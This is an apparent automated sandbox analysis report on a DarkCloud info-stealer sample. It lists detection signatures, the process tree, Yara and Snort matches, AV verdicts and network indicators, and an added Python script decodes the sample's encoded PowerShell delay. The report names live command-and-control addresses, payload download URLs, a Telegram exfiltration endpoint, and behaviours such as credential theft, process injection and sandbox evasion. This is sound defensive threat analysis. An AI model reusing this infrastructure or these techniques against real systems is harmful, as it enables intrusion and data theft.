
Windows Analysis Report
BPL_1000572_007.bat.exe

Overview

General Information

Sample Name: BPL_1000572_007.bat.exe
Analysis ID: 708242
MD5: 4ff4a281a08a0681597794a3024fb584
SHA1: d3a70362b238b82db1ef1aefef920afedf717880
SHA256: a6db7e8c70adc90b74c0f08503f49cf041d79afed3b916676892725ce2dbcce0
Tags: exe

Detection

DarkCloud
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Generic Dropper
Yara detected DarkCloud
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Creates multiple autostart registry keys
Writes or reads registry keys via WMI
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Costura Assembly Loader
Encrypted powershell cmdline option found
Machine Learning detection for sample
May check the online IP address of the machine
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Machine Learning detection for dropped file
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Drops PE files
Checks if the current process is being debugged
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Launches processes in debugging mode, may be used to hinder debugging
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Classification

  • System is w10x64
  • BPL_1000572_007.bat.exe (PID: 5820 cmdline: "C:\Users\user\Desktop\BPL_1000572_007.bat.exe" MD5: 4FF4A281A08A0681597794A3024FB584)
    • powershell.exe (PID: 5248 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • Wthdlxoyqvnqsfcfiinf.exe (PID: 5276 cmdline: "C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe" MD5: 386FB639720C77FC29E68682D264423F)
      • WerFault.exe (PID: 5744 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5276 -s 1352 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • BPL_1000572_007.bat.exe (PID: 1952 cmdline: C:\Users\user\Desktop\BPL_1000572_007.bat.exe MD5: 4FF4A281A08A0681597794A3024FB584)
  • pdf.exe (PID: 3712 cmdline: "C:\Users\user\AppData\Roaming\note\pdf.exe" MD5: 4FF4A281A08A0681597794A3024FB584)
  • pdf.exe (PID: 3536 cmdline: "C:\Users\user\AppData\Roaming\note\pdf.exe" MD5: 4FF4A281A08A0681597794A3024FB584)
  • fireless.exe (PID: 1420 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe" MD5: 4FF4A281A08A0681597794A3024FB584)
  • cleanup
No configs have been found
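The following Python is an added example and is not part of the Joe Sandbox report or of the sample. It parses the process tree printed above, decodes the -enc argument handed to powershell.exe (Base64 of UTF-16LE text, so "encoded" rather than encrypted, whatever the signature name says) and groups image paths by MD5, which makes the renamed copies of the sample (pdf.exe, fireless.exe) stand out. The tree lines are copied from the report; the line pattern, the -EncodedCommand prefix handling and all function names are this example's own assumptions.

```python
"""Process-tree triage for the Joe Sandbox tree above (added example, not report code).

Parses each 'image (PID: n cmdline: ... MD5: ...)' line, decodes PowerShell
-EncodedCommand arguments and groups image paths by MD5 so renamed copies of
the same binary stand out.
"""
import base64
import re
from collections import defaultdict

# Process-tree lines copied from the report, indentation removed.
PROCESS_TREE = r"""
BPL_1000572_007.bat.exe (PID: 5820 cmdline: "C:\Users\user\Desktop\BPL_1000572_007.bat.exe" MD5: 4FF4A281A08A0681597794A3024FB584)
powershell.exe (PID: 5248 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
conhost.exe (PID: 5252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
Wthdlxoyqvnqsfcfiinf.exe (PID: 5276 cmdline: "C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe" MD5: 386FB639720C77FC29E68682D264423F)
WerFault.exe (PID: 5744 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5276 -s 1352 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
BPL_1000572_007.bat.exe (PID: 1952 cmdline: C:\Users\user\Desktop\BPL_1000572_007.bat.exe MD5: 4FF4A281A08A0681597794A3024FB584)
pdf.exe (PID: 3712 cmdline: "C:\Users\user\AppData\Roaming\note\pdf.exe" MD5: 4FF4A281A08A0681597794A3024FB584)
pdf.exe (PID: 3536 cmdline: "C:\Users\user\AppData\Roaming\note\pdf.exe" MD5: 4FF4A281A08A0681597794A3024FB584)
fireless.exe (PID: 1420 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe" MD5: 4FF4A281A08A0681597794A3024FB584)
"""

LINE = re.compile(
    r'^(?P<image>\S+) \(PID: (?P<pid>\d+) cmdline: (?P<cmd>.*) MD5: (?P<md5>[0-9A-Fa-f]{32})\)$'
)

# powershell.exe accepts any prefix of -EncodedCommand from -e upward, plus -ec;
# longest alternatives first so "-enc" is never cut down to "-e".
_ENC_FLAGS = sorted({"encodedcommand"[:n] for n in range(1, 15)} | {"ec"}, key=len, reverse=True)
ENC_ARG = re.compile(r'(?:^|\s)[-/](?:' + '|'.join(_ENC_FLAGS) + r')\s+([A-Za-z0-9+/=]+)', re.I)


def parse_tree(text=PROCESS_TREE):
    """Return one dict per process line; raise on lines the pattern cannot read."""
    procs = []
    for line in text.strip().splitlines():
        m = LINE.match(line.strip())
        if m is None:
            raise ValueError(f"unparsed process line: {line!r}")
        procs.append(m.groupdict())
    return procs


def image_path(cmdline):
    """The executable path at the start of a command line, quoted or not."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        return cmdline[1:cmdline.index('"', 1)]
    return cmdline.split(maxsplit=1)[0]


def decode_encoded_command(cmdline):
    """Decode a -EncodedCommand payload (Base64 of UTF-16LE text); None if absent."""
    m = ENC_ARG.search(cmdline)
    if m is None:
        return None
    return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")


def copies_of(procs, md5):
    """Distinct image paths that ran with the given MD5: one binary under several names."""
    return {image_path(p["cmd"]) for p in procs if p["md5"].lower() == md5.lower()}


def triage(procs):
    """Summarise what an analyst reads off the tree."""
    by_md5 = defaultdict(set)
    for p in procs:
        by_md5[p["md5"].upper()].add(image_path(p["cmd"]))
    decoded = {p["pid"]: decode_encoded_command(p["cmd"]) for p in procs}
    return {
        "encoded_powershell": {pid: cmd for pid, cmd in decoded.items() if cmd is not None},
        "renamed_copies": {h: sorted(paths) for h, paths in by_md5.items() if len(paths) > 1},
        # Launches from per-user writable locations are where the dropped copies live.
        "appdata_launches": sorted({image_path(p["cmd"]) for p in procs
                                    if "\\AppData\\" in image_path(p["cmd"])}),
    }


if __name__ == "__main__":
    for key, value in triage(parse_tree()).items():
        print(f"{key}: {value}")
```

The decoded PowerShell payload is `Start-Sleep -Seconds 50`: the encoded command is only a delay (the "Contains long sleeps" and "May sleep (evasive loops)" signatures), not a second-stage download, which matters when deciding how much weight to give the "Encrypted powershell cmdline option found" hit on its own.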
Yara matches in memory dumps (.sdmp):

Source | Rule | Description | Author
00000000.00000002.571147253.000000000CCE0000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
00000014.00000002.590614103.0000000002A7E000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
00000000.00000002.448721724.000000000298E000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
00000016.00000002.597986476.00000000035FF000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
00000016.00000002.590549636.0000000003428000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
(first 5 of 26 memory-dump matches; the full report lists all 26)
Yara matches in unpacked PEs (.unpack):

Source | Rule | Description | Author | Strings
0.2.BPL_1000572_007.bat.exe.2a9d9dc.0.raw.unpack | JoeSecurity_DarkCloud | Yara detected DarkCloud | Joe Security |
0.2.BPL_1000572_007.bat.exe.2a9d9dc.0.raw.unpack | MALWARE_Win_A310Logger | Detects A310Logger | ditekSHen |
  • 0x7b98:$s1: Temporary Directory * for
  • 0x7bd4:$s2: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\*RD_
  • 0xe1d8:$s4: ExecQuery
  • 0x7b70:$s7: CopyHere
  • 0x7b2c:$s9: Shell.Application
  • 0x8224:$s9: shell.application
  • 0x69c8:$s12: @TITLE Removing
  • 0x7c68:$s13: @RD /S /Q "
  • 0xda9c:$v1_2: AddAttachment
0.2.BPL_1000572_007.bat.exe.39dddd0.1.unpack | JoeSecurity_DarkCloud | Yara detected DarkCloud | Joe Security |
0.2.BPL_1000572_007.bat.exe.39dddd0.1.unpack | MALWARE_Win_A310Logger | Detects A310Logger | ditekSHen |
  • 0x7b98:$s1: Temporary Directory * for
  • 0x2fbb8:$s1: Temporary Directory * for
  • 0x7bd4:$s2: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\*RD_
  • 0x2fbf4:$s2: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\*RD_
  • 0xe1d8:$s4: ExecQuery
  • 0x361f8:$s4: ExecQuery
  • 0x7b70:$s7: CopyHere
  • 0x2fb90:$s7: CopyHere
  • 0x7b2c:$s9: Shell.Application
  • 0x8224:$s9: shell.application
  • 0x2fb4c:$s9: Shell.Application
  • 0x30244:$s9: shell.application
  • 0x69c8:$s12: @TITLE Removing
  • 0x2e9e8:$s12: @TITLE Removing
  • 0x7c68:$s13: @RD /S /Q "
  • 0x2fc88:$s13: @RD /S /Q "
  • 0xda9c:$v1_2: AddAttachment
  • 0x35abc:$v1_2: AddAttachment
0.2.BPL_1000572_007.bat.exe.3a05df0.2.raw.unpack | JoeSecurity_DarkCloud | Yara detected DarkCloud | Joe Security |
(first 5 of 17 unpacked-PE matches; the full report lists all 17)
                  No Sigma rule has matched
Snort IDS alerts (all SID 2034631, protocol TCP, classtype "A Network Trojan was detected"):

Timestamp | Source | Destination
09/23/22-07:59:51.380310 | 192.168.2.6:49707 | 185.252.178.63:80
09/23/22-08:01:54.005892 | 192.168.2.6:49712 | 185.252.178.63:80
09/23/22-08:02:01.550542 | 192.168.2.6:49715 | 185.252.178.63:80
09/23/22-08:01:29.985260 | 192.168.2.6:49710 | 185.252.178.63:80
09/23/22-08:01:37.884830 | 192.168.2.6:49711 | 185.252.178.63:80


                  AV Detection

Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe | ReversingLabs: Detection: 61%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe | ReversingLabs: Detection: 32%
Source: C:\Users\user\AppData\Roaming\note\pdf.exe | ReversingLabs: Detection: 32%
Source: BPL_1000572_007.bat.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\note\pdf.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe | Joe Sandbox ML: detected
Source: 0.2.BPL_1000572_007.bat.exe.39dddd0.1.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 13.0.BPL_1000572_007.bat.exe.400000.0.unpack | Avira: Label: TR/Dropper.Gen
Source: 0.2.BPL_1000572_007.bat.exe.2a9d9dc.0.unpack | Avira: Label: TR/Patched.Ren.Gen

Note: pdf.exe and fireless.exe carry the submitted sample's MD5 (4FF4A281A08A0681597794A3024FB584, see the process tree), so the 32% ReversingLabs rate is the rate for the original binary under new names; Wthdlxoyqvnqsfcfiinf.exe (MD5 386FB639720C77FC29E68682D264423F) is a different binary and is the one with the 61% rate.

Source: BPL_1000572_007.bat.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: BPL_1000572_007.bat.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Binary strings (PDB / debug paths), grouped by source:
  WER8A92.tmp.dmp.21.dr (crash dump written by WerFault.exe, which the process tree shows launched with -p 5276, i.e. for Wthdlxoyqvnqsfcfiinf.exe): System.Core.ni.pdbRSDSD, System.Xml.ni.pdb, System.ni.pdbRSDS, System.Core.pdb\, System.Configuration.pdbj, System.Configuration.ni.pdb, mscorlib.ni.pdbRSDS, System.Configuration.pdb, System.Xml.pdb, System.pdb, System.Core.ni.pdb, mscorlib.pdb, mscorlib.ni.pdb, System.Configuration.ni.pdbRSDSO*, System.Core.pdb, System.pdb4:, System.Xml.ni.pdbRSDS, System.ni.pdb. These are the standard .NET Framework assemblies loaded by the crashed process; "RSDS" is the CodeView PDB record signature, and the other trailing characters are neighbouring bytes swept up by string extraction.
  Wthdlxoyqvnqsfcfiinf.exe, 0000000C.00000000.472966174.0000000000AF8000.00000004.00000010.00020000.00000000.sdmp: .pdb=, C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.PDBL, Wthdlxoyqvnqsfcfiinf.PDB, C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.PDB
  BPL_1000572_007.bat.exe (file); BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp; BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp; BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp; pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp; pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp; fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb (the on-disk sample file also contains this string), /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256w^ (a bundled Newtonsoft.Json assembly, consistent with the Costura assembly-loader Yara hits)

                  Networking

Source: Traffic | Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.6:49707 -> 185.252.178.63:80
Source: Traffic | Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.6:49710 -> 185.252.178.63:80
Source: Traffic | Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.6:49711 -> 185.252.178.63:80
Source: Traffic | Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.6:49712 -> 185.252.178.63:80
Source: Traffic | Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.6:49715 -> 185.252.178.63:80
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe | DNS query: name: showip.net
Source: Joe Sandbox View | ASN Name: LVLT-10753US
Source: global traffic | HTTP traffic detected: GET /loader/uploads/Arwiw_Xnqfdlpv.png HTTP/1.1; Host: 185.252.178.63; Connection: Keep-Alive (5 requests; the only headers sent are Host and Connection, so there is no User-Agent)
Source: global traffic | HTTP traffic detected: GET /loader/uploads/inf_Hpgwbzkt.bmp HTTP/1.1; Host: 185.252.178.63; Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 185.252.178.63
Source: unknown | TCP traffic detected without corresponding DNS query: 185.252.178.63 (50 identical entries in the report; the server is addressed by IP literal, as the Host header above shows, so no DNS lookup precedes the connections)
Source: BPL_1000572_007.bat.exe, 00000000.00000002.448025477.0000000002961000.00000004.00000800.00020000.00000000.sdmp; Wthdlxoyqvnqsfcfiinf.exe, 0000000C.00000000.475145400.0000000002941000.00000004.00000800.00020000.00000000.sdmp; pdf.exe, 00000011.00000002.590879859.000000000329C000.00000004.00000800.00020000.00000000.sdmp; pdf.exe, 00000014.00000002.589770623.0000000002A51000.00000004.00000800.00020000.00000000.sdmp; fireless.exe, 00000016.00000002.589535207.00000000033F1000.00000004.00000800.00020000.00000000.sdmp | Strings found in binary or memory:
  http://185.252.178.63
  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: BPL_1000572_007.bat.exe, 00000000.00000002.448025477.0000000002961000.00000004.00000800.00020000.00000000.sdmp; pdf.exe, 00000011.00000002.590699923.0000000003291000.00000004.00000800.00020000.00000000.sdmp; pdf.exe, 00000014.00000002.589770623.0000000002A51000.00000004.00000800.00020000.00000000.sdmp; fireless.exe, 00000016.00000002.589535207.00000000033F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://185.252.178.63/loader/uploads/Arwiw_Xnqfdlpv.png
Source: BPL_1000572_007.bat.exe, pdf.exe.0.dr, fireless.exe.13.dr | String found in binary or memory: http://185.252.178.63/loader/uploads/Arwiw_Xnqfdlpv.pngP/r/
Source: Wthdlxoyqvnqsfcfiinf.exe, 0000000C.00000000.475145400.0000000002941000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://185.252.178.63/loader/uploads/inf_Hpgwbzkt.bmp
Source: Wthdlxoyqvnqsfcfiinf.exe, 0000000C.00000000.430950598.00000000006D2000.00000002.00000001.01000000.00000007.sdmp, Wthdlxoyqvnqsfcfiinf.exe.0.dr | String found in binary or memory: http://185.252.178.63/loader/uploads/inf_Hpgwbzkt.bmp)Acugwsmmzufefycomfxvihl
Source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp; BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp; BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp; pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp; pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp; fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp | Strings found in binary or memory:
  http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
  http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
  http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA.crt0
  http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
  http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
  http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA.crl0E
  http://crl3.digicert.com/sha2-assured-ts.crl02
  http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
  http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA.crl0L
  http://crl4.digicert.com/sha2-assured-ts.crl0
  http://ocsp.digicert.com0C
  http://ocsp.digicert.com0K
  http://ocsp.digicert.com0N
  http://ocsp.digicert.com0O
  These are AIA, CRL and OCSP URLs from an Authenticode certificate chain (.NET Foundation code-signing CA plus DigiCert timestamping), found in the same dumps as the Newtonsoft.Json.pdb path above; they belong to the bundled, signed Newtonsoft.Json assembly and are not attacker infrastructure.
Source: fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://james.newtonking.com/projects/json
Source: BPL_1000572_007.bat.exe, 0000000D.00000002.579528582.000000000109D000.00000004.00000020.00020000.00000000.sdmp; BPL_1000572_007.bat.exe, 0000000D.00000003.449921184.000000000109D000.00000004.00000020.00020000.00000000.sdmp; BPL_1000572_007.bat.exe, 0000000D.00000003.452428690.000000000109D000.00000004.00000020.00020000.00000000.sdmp; BPL_1000572_007.bat.exe, 0000000D.00000003.467298844.000000000109D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://schema.org
Source: BPL_1000572_007.bat.exe, 00000000.00000002.476692694.0000000003969000.00000004.00000800.00020000.00000000.sdmp; BPL_1000572_007.bat.exe, 00000000.00000002.478754600.0000000003A55000.00000004.00000800.00020000.00000000.sdmp; BPL_1000572_007.bat.exe, 00000000.00000002.477582382.00000000039C1000.00000004.00000800.00020000.00000000.sdmp; BPL_1000572_007.bat.exe, 00000000.00000002.452043304.0000000002A97000.00000004.00000800.00020000.00000000.sdmp; BPL_1000572_007.bat.exe, 0000000D.00000000.435627430.0000000000401000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://showip.netxhttp://www.mediacollege.com/internet/utilities/show-ip.shtml__vbaLsetFixstr__vbaFi (the showip.net lookup behind the "May check the online IP address of the machine" signature; the __vba* names are MSVBVM60.dll, i.e. Visual Basic 6 runtime, import names, and the 0000000D dump at 0x401000 is the image injected into the second, suspended BPL_1000572_007.bat.exe instance)
Source: Amcache.hve.21.dr | String found in binary or memory: http://upx.sf.net
                  Source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
Source: LoghemosideroticdJPxvxBPhxRvFDWcDVPhPZaUIGIDQLVJwWmvfjYBsLDUhypometropia.13.dr | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: BPL_1000572_007.bat.exe, 00000000.00000002.448721724.000000000298E000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.460105913.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: BPL_1000572_007.bat.exe, 00000000.00000002.460105913.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.598968323.00000000034A4000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592125246.00000000032F4000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.598264553.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.590614103.0000000002A7E000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591295608.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.597986476.00000000035FF000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.590549636.0000000003428000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591002736.0000000003454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot4(SpawnProcess)
Source: LoghemosideroticdJPxvxBPhxRvFDWcDVPhPZaUIGIDQLVJwWmvfjYBsLDUhypometropia.13.dr | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: LoghemosideroticdJPxvxBPhxRvFDWcDVPhPZaUIGIDQLVJwWmvfjYBsLDUhypometropia.13.dr | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: BPL_1000572_007.bat.exe, 0000000D.00000003.451016918.00000000010BE000.00000004.00000020.00020000.00000000.sdmp, LoghemosideroticdJPxvxBPhxRvFDWcDVPhPZaUIGIDQLVJwWmvfjYBsLDUhypometropia.13.dr | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: LoghemosideroticdJPxvxBPhxRvFDWcDVPhPZaUIGIDQLVJwWmvfjYBsLDUhypometropia.13.dr | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: BPL_1000572_007.bat.exe, 0000000D.00000003.451016918.00000000010BE000.00000004.00000020.00020000.00000000.sdmp, LoghemosideroticdJPxvxBPhxRvFDWcDVPhPZaUIGIDQLVJwWmvfjYBsLDUhypometropia.13.dr | String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: BPL_1000572_007.bat.exe, 0000000D.00000003.451016918.00000000010BE000.00000004.00000020.00020000.00000000.sdmp, LoghemosideroticdJPxvxBPhxRvFDWcDVPhPZaUIGIDQLVJwWmvfjYBsLDUhypometropia.13.dr | String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: BPL_1000572_007.bat.exe, 0000000D.00000003.451016918.00000000010BE000.00000004.00000020.00020000.00000000.sdmp, LoghemosideroticdJPxvxBPhxRvFDWcDVPhPZaUIGIDQLVJwWmvfjYBsLDUhypometropia.13.dr | String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: BPL_1000572_007.bat.exe, 0000000D.00000003.451016918.00000000010BE000.00000004.00000020.00020000.00000000.sdmp, LoghemosideroticdJPxvxBPhxRvFDWcDVPhPZaUIGIDQLVJwWmvfjYBsLDUhypometropia.13.dr | String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
                  Source: BPL_1000572_007.bat.exe, 0000000D.00000002.579528582.000000000109D000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.449921184.000000000109D000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.452428690.000000000109D000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.467298844.000000000109D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://showip.net/
                  Source: BPL_1000572_007.bat.exe, 0000000D.00000002.579528582.000000000109D000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.449921184.000000000109D000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.452428690.000000000109D000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.467298844.000000000109D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://showip.net/?checkip=
                  Source: BPL_1000572_007.bat.exe, 0000000D.00000003.468874553.00000000010AD000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000002.579802617.00000000010AD000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.468843725.0000000001094000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.467326371.00000000010AD000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.467288810.0000000001094000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://unpkg.com/leaflet
                  Source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
